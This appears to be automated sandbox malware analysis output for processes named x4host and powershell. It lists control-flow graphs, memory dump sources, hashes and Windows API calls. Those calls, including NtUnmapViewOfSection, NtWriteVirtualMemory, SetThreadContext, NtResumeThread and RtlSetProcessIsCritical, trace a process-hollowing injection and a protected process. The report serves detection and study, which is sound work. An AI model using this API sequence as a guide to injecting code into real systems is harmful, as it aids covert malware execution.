                                                  • API String ID:
                                                  • Opcode ID: bf4efdec02476b8519c792bf5779d612ec32881f7eac62af62450a81c5b897e4
                                                  • Instruction ID: 9b80d5dcadb04be7acfbdd132908dacf9f7605959d4067b9af268b12c1b7b108
                                                  • Opcode Fuzzy Hash: bf4efdec02476b8519c792bf5779d612ec32881f7eac62af62450a81c5b897e4
                                                  • Instruction Fuzzy Hash: 3D321C30E1961D8BDB69EB64C4A5BF9B7B1FF49304F1044B9D01EE32A6CE356A81CB50
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3020328795.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd9b880000_x4host.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9de6615b75720b5890bef9dfeead0e84bfce141a9b66b113fa21e3ad2c9c2be1
                                                  • Instruction ID: 084c413cefe59c109ae694cd3e766d837af2d56e4803b4b2d3d722263b22778e
                                                  • Opcode Fuzzy Hash: 9de6615b75720b5890bef9dfeead0e84bfce141a9b66b113fa21e3ad2c9c2be1
                                                  • Instruction Fuzzy Hash: 0A61FA70E1991D8FDB58EF98C4A5ABCBBF1FF59305F111169D01EE72A2CA35A881CB00

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 347 7ffd9b888d4d-7ffd9b888e30 RtlSetProcessIsCritical 351 7ffd9b888e38-7ffd9b888e6d 347->351 352 7ffd9b888e32 347->352 352->351
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.3020328795.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ffd9b880000_x4host.jbxd
                                                  Similarity
                                                  • API ID: CriticalProcess
                                                  • String ID:
                                                  • API String ID: 2695349919-0
                                                  • Opcode ID: 505d7253d65eb394661b9275465c2c4bd297dfd2faa961a7ffc989a4767f23f5
                                                  • Instruction ID: c19862884b03a08b226679ce6b40457c0e87d8fb2ae5c9dff75f664a8cf7dd71
                                                  • Opcode Fuzzy Hash: 505d7253d65eb394661b9275465c2c4bd297dfd2faa961a7ffc989a4767f23f5
                                                  • Instruction Fuzzy Hash: FE41033190C7588FDB29DFA8D855AE9BBF0FF56310F04416EE09AC3592CB746846CB91

                                                  Execution Graph

                                                  Execution Coverage:8.3%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:44.4%
                                                  Total number of Nodes:27
                                                  Total number of Limit Nodes:0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 780 7ffd9bb13449-7ffd9bb134d4 785 7ffd9bb135b4-7ffd9bb135f1 780->785 786 7ffd9bb134da-7ffd9bb134e4 780->786 801 7ffd9bb135f3 785->801 802 7ffd9bb13637 785->802 787 7ffd9bb134fd-7ffd9bb13502 786->787 788 7ffd9bb134e6-7ffd9bb134f3 786->788 791 7ffd9bb13504-7ffd9bb13507 787->791 792 7ffd9bb13555-7ffd9bb1355f 787->792 788->787 794 7ffd9bb134f5-7ffd9bb134fb 788->794 791->792 797 7ffd9bb13509-7ffd9bb1350c 791->797 795 7ffd9bb1356e-7ffd9bb135b1 792->795 796 7ffd9bb13561-7ffd9bb1356d 792->796 794->787 795->785 797->792 800 7ffd9bb1350e-7ffd9bb13518 797->800 800->792 809 7ffd9bb1351a-7ffd9bb1352e 800->809 805 7ffd9bb13654-7ffd9bb13665 801->805 806 7ffd9bb135f5-7ffd9bb1360e 801->806 804 7ffd9bb13639-7ffd9bb13644 802->804 810 7ffd9bb13645-7ffd9bb13650 804->810 811 7ffd9bb13667 805->811 812 7ffd9bb13668-7ffd9bb13679 805->812 806->804 820 7ffd9bb13610-7ffd9bb13636 806->820 822 7ffd9bb13530-7ffd9bb1353d 809->822 823 7ffd9bb13547-7ffd9bb13554 809->823 810->805 811->812 815 7ffd9bb1367b 812->815 816 7ffd9bb1367c-7ffd9bb13699 812->816 815->816 816->810 821 7ffd9bb1369b-7ffd9bb13704 816->821 820->802 830 7ffd9bb1380d-7ffd9bb13867 821->830 831 7ffd9bb1370a-7ffd9bb13714 821->831 822->823 828 7ffd9bb1353f-7ffd9bb13545 822->828 828->823 857 7ffd9bb13892-7ffd9bb1389b 830->857 858 7ffd9bb13869-7ffd9bb13890 830->858 832 7ffd9bb1372d-7ffd9bb13732 831->832 833 7ffd9bb13716-7ffd9bb13723 831->833 837 7ffd9bb137ae-7ffd9bb137b8 832->837 838 7ffd9bb13734-7ffd9bb13737 832->838 833->832 840 7ffd9bb13725-7ffd9bb1372b 833->840 844 7ffd9bb137c7-7ffd9bb1380a 837->844 845 7ffd9bb137ba-7ffd9bb137c6 837->845 842 7ffd9bb1375e 838->842 843 7ffd9bb13739-7ffd9bb1375c 838->843 840->832 848 7ffd9bb13760-7ffd9bb13762 842->848 843->848 844->830 848->837 852 7ffd9bb13764-7ffd9bb13767 848->852 852->837 856 7ffd9bb13769-7ffd9bb1376c 852->856 856->837 859 7ffd9bb1376e-7ffd9bb13778 856->859 861 7ffd9bb1389d-7ffd9bb138bd 857->861 858->857 859->837 865 7ffd9bb1377a-7ffd9bb137ad 859->865 870 7ffd9bb138bf 861->870 871 7ffd9bb138c0-7ffd9bb138d1 861->871 870->871 873 7ffd9bb138d3 871->873 874 7ffd9bb138d4-7ffd9bb138f1 871->874 873->874 874->861 876 7ffd9bb138f3-7ffd9bb13967 874->876 879 7ffd9bb1396d-7ffd9bb13977 876->879 880 7ffd9bb13abf-7ffd9bb13afc 876->880 881 7ffd9bb13993-7ffd9bb139a0 879->881 882 7ffd9bb13979-7ffd9bb13991 879->882 892 7ffd9bb13b3d-7ffd9bb13b43 880->892 893 7ffd9bb13afe 880->893 887 7ffd9bb13a60-7ffd9bb13a6a 881->887 888 7ffd9bb139a6-7ffd9bb139a9 881->888 882->881 894 7ffd9bb13a79-7ffd9bb13abc 887->894 895 7ffd9bb13a6c-7ffd9bb13a78 887->895 888->887 891 7ffd9bb139af-7ffd9bb139b7 888->891 891->880 897 7ffd9bb139bd-7ffd9bb139c7 891->897 896 7ffd9bb13b44-7ffd9bb13b5b 892->896 898 7ffd9bb13b5f-7ffd9bb13b71 893->898 899 7ffd9bb13b00-7ffd9bb13b19 893->899 894->880 896->898 903 7ffd9bb139e0-7ffd9bb139e4 897->903 904 7ffd9bb139c9-7ffd9bb139de 897->904 901 7ffd9bb13b73 898->901 902 7ffd9bb13b74-7ffd9bb13b85 898->902 899->896 915 7ffd9bb13b1b-7ffd9bb13b3a 899->915 901->902 907 7ffd9bb13b87 902->907 908 7ffd9bb13b88-7ffd9bb13ba1 902->908 903->887 910 7ffd9bb139e6-7ffd9bb139e9 903->910 904->903 907->908 913 7ffd9bb13a10 910->913 914 7ffd9bb139eb-7ffd9bb13a0e 910->914 917 7ffd9bb13a12-7ffd9bb13a14 913->917 914->917 915->892 917->887 919 7ffd9bb13a16-7ffd9bb13a39 917->919 924 7ffd9bb13a52-7ffd9bb13a5f 919->924 925 7ffd9bb13a3b-7ffd9bb13a48 919->925 925->924 927 7ffd9bb13a4a-7ffd9bb13a50 925->927 927->924
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1791655273.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9bb10000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 0_L
                                                  • API String ID: 0-1300080838
                                                  • Opcode ID: f39cc5d3e9708f95217cd76cd12717239f0c5411e6aaaccb522ec69455b2a936
                                                  • Instruction ID: e260e12d10cb61f348657531db7ff22204268c2cc2a0e6b6d28c9baf5b3d1e3a
                                                  • Opcode Fuzzy Hash: f39cc5d3e9708f95217cd76cd12717239f0c5411e6aaaccb522ec69455b2a936
                                                  • Instruction Fuzzy Hash: 3C423662B0EACD1FE7A69BA818745B57FE1EF56214B0901FBD08DC71E3E908AD06C351

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1082 7ffd9b880c6d-7ffd9b880c79 1083 7ffd9b880c84-7ffd9b880cf8 1082->1083 1084 7ffd9b880c7b-7ffd9b880c83 1082->1084 1088 7ffd9b880d02-7ffd9b880d45 NtWriteVirtualMemory 1083->1088 1089 7ffd9b880cfa-7ffd9b880cff 1083->1089 1084->1083 1090 7ffd9b880d4d-7ffd9b880d6a 1088->1090 1091 7ffd9b880d47 1088->1091 1089->1088 1091->1090
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: c27faee59487138b20dc0c03031b5c64c5a183ce3d2b640ace63191b5c3b6c2a
                                                  • Instruction ID: d3396c125c728e3cbdb2c0f7797903cea3d1874b007a79174b065831c7c76f71
                                                  • Opcode Fuzzy Hash: c27faee59487138b20dc0c03031b5c64c5a183ce3d2b640ace63191b5c3b6c2a
                                                  • Instruction Fuzzy Hash: 1531143190CB4D9FDB28DB58D845BF9BBE4FF1A320F00036EE059D3692CB24A8028785

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1092 7ffd9b880a4e-7ffd9b880a5b 1093 7ffd9b880a5d-7ffd9b880a65 1092->1093 1094 7ffd9b880a66-7ffd9b880b18 NtUnmapViewOfSection 1092->1094 1093->1094 1098 7ffd9b880b20-7ffd9b880b3c 1094->1098 1099 7ffd9b880b1a 1094->1099 1099->1098
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: SectionUnmapView
                                                  • String ID:
                                                  • API String ID: 498011366-0
                                                  • Opcode ID: 8aeb8c6645ac3cf98fb23b47f0b8aae506a49425afe03cf917b19ddee0e2b8ea
                                                  • Instruction ID: 80528c8a868c68ae6c7f100859bf678d67a325d1847f04433076396fd3e6e2c0
                                                  • Opcode Fuzzy Hash: 8aeb8c6645ac3cf98fb23b47f0b8aae506a49425afe03cf917b19ddee0e2b8ea
                                                  • Instruction Fuzzy Hash: EE31073090D7888FDB5ADB68CC557A97FE0EF56320F04429BD049C72A3D674A446CB92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1100 7ffd9b880ff4-7ffd9b880ffb 1101 7ffd9b880ffd-7ffd9b881005 1100->1101 1102 7ffd9b881006-7ffd9b8810b2 NtResumeThread 1100->1102 1101->1102 1106 7ffd9b8810b4 1102->1106 1107 7ffd9b8810ba-7ffd9b8810d6 1102->1107 1106->1107
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 8ebda8be91db3a44c2ec10d53f9c06d194c2b053f14b7b8cb97db600eb446245
                                                  • Instruction ID: 31bd12e49bc891a197e26fc8b780a12a38010e46b3a693f1b529dcb5b847b3d1
                                                  • Opcode Fuzzy Hash: 8ebda8be91db3a44c2ec10d53f9c06d194c2b053f14b7b8cb97db600eb446245
                                                  • Instruction Fuzzy Hash: 9A31F831A0CA4C8FDB58DF98D8467E9BBE1EF5A320F04416BD049C3256DB70A846CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1115 7ffd9b87e0f2-7ffd9b880cf8 1119 7ffd9b880d02-7ffd9b880d45 NtWriteVirtualMemory 1115->1119 1120 7ffd9b880cfa-7ffd9b880cff 1115->1120 1121 7ffd9b880d4d-7ffd9b880d6a 1119->1121 1122 7ffd9b880d47 1119->1122 1120->1119 1122->1121
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryVirtualWrite
                                                  • String ID:
                                                  • API String ID: 3527976591-0
                                                  • Opcode ID: defb7b632d1604b80c31ca8b1889eb3adc854de5d7586998eb21ce6e0035a5f4
                                                  • Instruction ID: b126b02eb60bd36c8914d05c917935504e862ce4ad593e712a11ecf5bd2d49b3
                                                  • Opcode Fuzzy Hash: defb7b632d1604b80c31ca8b1889eb3adc854de5d7586998eb21ce6e0035a5f4
                                                  • Instruction Fuzzy Hash: 4D31B331A0CE0C9FDB589B5CD845BFABBE4FB59320F00022EE05ED3692CB61A8018785
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: 8e16eeada3eaaaa165352f76cd4ae39354e47f4cc01f7f263c0eba12ca542479
                                                  • Instruction ID: 69135e76b9375af10e69c5645770932dae244b373d9c3232761dd1b95568e1d6
                                                  • Opcode Fuzzy Hash: 8e16eeada3eaaaa165352f76cd4ae39354e47f4cc01f7f263c0eba12ca542479
                                                  • Instruction Fuzzy Hash: 0121F43060CB4C4FDB68DF68C846BFA7BE1EF56320F00426ED099C32A2CA259447CB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: 28a74a86d3da20769df2fe8f9469f530b5174ac9554cfad01dd6e686e0201019
                                                  • Instruction ID: 5617f9b40373434f53d7df62dabf71088471983569b2665cd6921ae43f66dd55
                                                  • Opcode Fuzzy Hash: 28a74a86d3da20769df2fe8f9469f530b5174ac9554cfad01dd6e686e0201019
                                                  • Instruction Fuzzy Hash: 3A21A370A0CA1C8FDB58DF9CD84ABF9BBE1EB59310F00416ED00DD3255DB70A8428B91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: a0580efcb4b970770817053e7ad9565bf50557208d337bedb3dbca357a1a9d9d
                                                  • Instruction ID: 4edb4e47c5964deaa8872edaa50cc1ee3f84ef2b44a4bbc9af1a8229a3e11596
                                                  • Opcode Fuzzy Hash: a0580efcb4b970770817053e7ad9565bf50557208d337bedb3dbca357a1a9d9d
                                                  • Instruction Fuzzy Hash: 2521C57060CA0C9FDB68DF5CD84ABFA77E1EB56320F10426ED05AC3296CA61A443CB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThread
                                                  • String ID:
                                                  • API String ID: 1591575202-0
                                                  • Opcode ID: a0580efcb4b970770817053e7ad9565bf50557208d337bedb3dbca357a1a9d9d
                                                  • Instruction ID: 4edb4e47c5964deaa8872edaa50cc1ee3f84ef2b44a4bbc9af1a8229a3e11596
                                                  • Opcode Fuzzy Hash: a0580efcb4b970770817053e7ad9565bf50557208d337bedb3dbca357a1a9d9d
                                                  • Instruction Fuzzy Hash: 2521C57060CA0C9FDB68DF5CD84ABFA77E1EB56320F10426ED05AC3296CA61A443CB91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: SectionUnmapView
                                                  • String ID:
                                                  • API String ID: 498011366-0
                                                  • Opcode ID: a6b4d8f1bb81ba31d6b2aefc68f7e80abd4158666831065f9dfe699d2713efd5
                                                  • Instruction ID: f2aec71941504e11b3e81b87c75dddd9308feb3ebd6f237d049f262dc7a14a59
                                                  • Opcode Fuzzy Hash: a6b4d8f1bb81ba31d6b2aefc68f7e80abd4158666831065f9dfe699d2713efd5
                                                  • Instruction Fuzzy Hash: F421A470A08A0C8FDB58DF9CD84ABF977E0EB59321F00416ED04ED3252D770A846CB91
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1787028815.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: efc3518b1c6049a1a21935f5f8dc9e028279c75e8abfc19fd0720ce9d05cbfd5
                                                  • Instruction ID: 59b340ee98fb0cddec9224438481b803f9968e54cf3fed6adee6d355392fd771
                                                  • Opcode Fuzzy Hash: efc3518b1c6049a1a21935f5f8dc9e028279c75e8abfc19fd0720ce9d05cbfd5
                                                  • Instruction Fuzzy Hash: A8134971E2DB994FE774DB68589666577D1FF69B04F0605AEC448C3293EE20BC02CB82

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 416 7ffd9b880231-7ffd9b88023d 417 7ffd9b88023f-7ffd9b880247 416->417 418 7ffd9b880248-7ffd9b880702 416->418 417->418 428 7ffd9b880704-7ffd9b880713 418->428 429 7ffd9b880760-7ffd9b880792 418->429 428->429 430 7ffd9b880715-7ffd9b880718 428->430 436 7ffd9b880794-7ffd9b8807a3 429->436 437 7ffd9b8807f0-7ffd9b880841 429->437 431 7ffd9b880752-7ffd9b88075a 430->431 432 7ffd9b88071a-7ffd9b88072d 430->432 431->429 434 7ffd9b880731-7ffd9b880744 432->434 435 7ffd9b88072f 432->435 434->434 438 7ffd9b880746-7ffd9b880750 434->438 435->434 436->437 439 7ffd9b8807a5-7ffd9b8807a8 436->439 443 7ffd9b880843-7ffd9b880852 437->443 444 7ffd9b88089f-7ffd9b8808d0 437->444 438->431 441 7ffd9b8807e2-7ffd9b8807ea 439->441 442 7ffd9b8807aa-7ffd9b8807bd 439->442 441->437 445 7ffd9b8807c1-7ffd9b8807d4 442->445 446 7ffd9b8807bf 442->446 443->444 448 7ffd9b880854-7ffd9b880857 443->448 452 7ffd9b8808d2-7ffd9b8808da 444->452 453 7ffd9b8808de-7ffd9b88095e CreateProcessA 444->453 445->445 447 7ffd9b8807d6-7ffd9b8807e0 445->447 446->445 447->441 449 7ffd9b880891-7ffd9b880899 448->449 450 7ffd9b880859-7ffd9b88086c 448->450 449->444 454 7ffd9b880870-7ffd9b880883 450->454 455 7ffd9b88086e 450->455 452->453 456 7ffd9b880960 453->456 457 7ffd9b880966-7ffd9b8809a3 call 7ffd9b8809bf 453->457 454->454 458 7ffd9b880885-7ffd9b88088d 454->458 455->454 456->457 461 7ffd9b8809aa-7ffd9b8809be 457->461 462 7ffd9b8809a5 457->462 458->449 462->461
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: d70e45039cb6cef0d1ab6bf1668a741f1628c6b5c2f3fd49d51380fdaeff43b9
                                                  • Instruction ID: 96555a830b4af8e33c6cf5d5fd56b1dddfb4003eef2920dd86c161b49d2efc0d
                                                  • Opcode Fuzzy Hash: d70e45039cb6cef0d1ab6bf1668a741f1628c6b5c2f3fd49d51380fdaeff43b9
                                                  • Instruction Fuzzy Hash: 3FD13730A19B8D8FDB65DF28CC567E53BE0FF49710F01426BD85DC7292DA34A9458B82
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1787028815.00007FFD9B940000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B940000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b940000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a752452081c327cd9b53e9ccf5d3b0357d8f9f878e5fbf255b24bc853d66cb44
                                                  • Instruction ID: 3569e480527637def067f5d0f06e3c0b64a8d0112907cf16bc2289e56de3c535
                                                  • Opcode Fuzzy Hash: a752452081c327cd9b53e9ccf5d3b0357d8f9f878e5fbf255b24bc853d66cb44
                                                  • Instruction Fuzzy Hash: DBF22871E2CF994BE774DF68589666577D0EFA8B04F0605AED448C3293EE20BC41CB86

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 929 7ffd9b87e0bb-7ffd9b880702 934 7ffd9b880704-7ffd9b880713 929->934 935 7ffd9b880760-7ffd9b880792 929->935 934->935 936 7ffd9b880715-7ffd9b880718 934->936 942 7ffd9b880794-7ffd9b8807a3 935->942 943 7ffd9b8807f0-7ffd9b880841 935->943 937 7ffd9b880752-7ffd9b88075a 936->937 938 7ffd9b88071a-7ffd9b88072d 936->938 937->935 940 7ffd9b880731-7ffd9b880744 938->940 941 7ffd9b88072f 938->941 940->940 944 7ffd9b880746-7ffd9b880750 940->944 941->940 942->943 945 7ffd9b8807a5-7ffd9b8807a8 942->945 949 7ffd9b880843-7ffd9b880852 943->949 950 7ffd9b88089f-7ffd9b8808d0 943->950 944->937 947 7ffd9b8807e2-7ffd9b8807ea 945->947 948 7ffd9b8807aa-7ffd9b8807bd 945->948 947->943 951 7ffd9b8807c1-7ffd9b8807d4 948->951 952 7ffd9b8807bf 948->952 949->950 954 7ffd9b880854-7ffd9b880857 949->954 958 7ffd9b8808d2-7ffd9b8808da 950->958 959 7ffd9b8808de-7ffd9b88095e CreateProcessA 950->959 951->951 953 7ffd9b8807d6-7ffd9b8807e0 951->953 952->951 953->947 955 7ffd9b880891-7ffd9b880899 954->955 956 7ffd9b880859-7ffd9b88086c 954->956 955->950 960 7ffd9b880870-7ffd9b880883 956->960 961 7ffd9b88086e 956->961 958->959 962 7ffd9b880960 959->962 963 7ffd9b880966-7ffd9b8809a3 call 7ffd9b8809bf 959->963 960->960 964 7ffd9b880885-7ffd9b88088d 960->964 961->960 962->963 967 7ffd9b8809aa-7ffd9b8809be 963->967 968 7ffd9b8809a5 963->968 964->955 968->967
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 6ededfafed5a9a1c9ef8b64309384dec44792251bb737d2b0a2b3dea1fbc0e1f
                                                  • Instruction ID: c90dbe8d21b05aace77e3b0b1a7d16a4646519d8ebbe3d6f4bc025362133fa3d
                                                  • Opcode Fuzzy Hash: 6ededfafed5a9a1c9ef8b64309384dec44792251bb737d2b0a2b3dea1fbc0e1f
                                                  • Instruction Fuzzy Hash: E4B1C430A18E4D8FEB68DF58CC567E977D0FB58711F10422AE85EC3291DB74A5818BC2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 969 7ffd9b87eb0a-7ffd9b87eb17 970 7ffd9b87eb22-7ffd9b87ebef 969->970 971 7ffd9b87eb19-7ffd9b87eb21 969->971 975 7ffd9b87ebf1-7ffd9b87ec00 970->975 976 7ffd9b87ec4a-7ffd9b87ecc7 CreateFileMappingW 970->976 971->970 975->976 977 7ffd9b87ec02-7ffd9b87ec05 975->977 983 7ffd9b87eccf-7ffd9b87ed0b call 7ffd9b87ed27 976->983 984 7ffd9b87ecc9 976->984 978 7ffd9b87ec3f-7ffd9b87ec47 977->978 979 7ffd9b87ec07-7ffd9b87ec1a 977->979 978->976 981 7ffd9b87ec1e-7ffd9b87ec31 979->981 982 7ffd9b87ec1c 979->982 981->981 985 7ffd9b87ec33-7ffd9b87ec3b 981->985 982->981 989 7ffd9b87ed12-7ffd9b87ed26 983->989 990 7ffd9b87ed0d 983->990 984->983 985->978 990->989
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFileMapping
                                                  • String ID:
                                                  • API String ID: 524692379-0
                                                  • Opcode ID: c75d127b18e69c2914a4d7979228008be0162c26d88dc9c95bbdcd77a1930633
                                                  • Instruction ID: 697de56ead621a46595b49d6cf8c07d01c2ab4accce8bd2d5e01bc1587034248
                                                  • Opcode Fuzzy Hash: c75d127b18e69c2914a4d7979228008be0162c26d88dc9c95bbdcd77a1930633
                                                  • Instruction Fuzzy Hash: 2C71283061CA8C4FDB59DF28C855BE53FE4FF5A351F1402AEE84DC72A2DA75A8418782

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 991 7ffd9b87e8bc-7ffd9b87e8c3 992 7ffd9b87e8ce-7ffd9b87e963 991->992 993 7ffd9b87e8c5-7ffd9b87e8cd 991->993 997 7ffd9b87e9ad 992->997 998 7ffd9b87e965-7ffd9b87e967 992->998 993->992 1001 7ffd9b87e9ae-7ffd9b87e9b3 997->1001 1002 7ffd9b87e9f7-7ffd9b87ea0d 997->1002 999 7ffd9b87e9c2-7ffd9b87e9f3 998->999 1000 7ffd9b87e969-7ffd9b87e978 998->1000 999->1002 1000->999 1003 7ffd9b87e97a-7ffd9b87e97d 1000->1003 1004 7ffd9b87e9b7-7ffd9b87e9c1 1001->1004 1005 7ffd9b87ea0f-7ffd9b87ea5a CreateFileA 1002->1005 1003->1004 1008 7ffd9b87e97f-7ffd9b87e992 1003->1008 1004->999 1004->1005 1006 7ffd9b87ea62-7ffd9b87ea9e call 7ffd9b87eaba 1005->1006 1007 7ffd9b87ea5c 1005->1007 1016 7ffd9b87eaa0 1006->1016 1017 7ffd9b87eaa5-7ffd9b87eab9 1006->1017 1007->1006 1010 7ffd9b87e994 1008->1010 1011 7ffd9b87e996-7ffd9b87e9a9 1008->1011 1010->1011 1011->1011 1013 7ffd9b87e9ab-7ffd9b87e9ac 1011->1013 1013->997 1016->1017
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1786251212.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b870000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 397728b0545a1d00ee52a12923c1c5cb1ea4f9fc530a60b6b0aee9a025a7246e
                                                  • Instruction ID: 469bb6c38b7e4b8e8e594aa8f93de60eb9ba7f108649d66ac8e976ef836ab35a
                                                  • Opcode Fuzzy Hash: 397728b0545a1d00ee52a12923c1c5cb1ea4f9fc530a60b6b0aee9a025a7246e
                                                  • Instruction Fuzzy Hash: D6612B30A1CA8D4FDB68EF18CC557E57BE0FF59315F00426AE84DC72A2DA34A9418B91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
